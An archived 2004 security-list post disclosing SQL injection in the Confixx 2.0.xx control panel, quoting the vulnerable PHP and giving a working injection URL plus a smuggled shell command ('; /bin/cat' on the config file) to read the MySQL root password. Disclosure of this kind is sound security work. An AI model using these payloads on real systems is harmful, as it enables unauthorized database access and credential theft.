lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <20040309092447.2871.qmail@mail.krefeld.schulen.net>
From: checker at mail.krefeld.schulen.net (checker@...l.krefeld.schulen.net)
Subject: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW

SQL-Injections in Confixx 2.0.xx // reading MySQL Root-PW


include("auth.php");

db_connect($db_host, $db_user, $db_pass);

$id = db_query("select count(datenbank) as mysql from mysql_datenbanken
where kunde = '$PHP_AUTH_USER'");
$werte = db_fetch_array($id);
$mysql = $werte["mysql"];

$id = db_query("select dbname from mysql_datenbanken where kunde =
'$PHP_AUTH_USER' and datenbank = '$db'");
--------------------------------^^^^^^^^^

$db --> unchecked Value

____


/user/db_mysql_loeschen2.php?db=1


SELECT db FROM sqldb WHERE user='$USER' AND db='$formular_wert'

using: ' or 1 or 1='

the SQL query look like :

SELECT db FROM sqldb WHERE user='$USER' AND db='' or 1 or 1=''


/user/db_mysql_loeschen2.php?db=' or 1 or 1='



______

Confixx Perl Debugger

using:

 ; /bin/cat location_of_Confixx_config_file


to read the config with MySQL Root-PW

_______


wkr

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ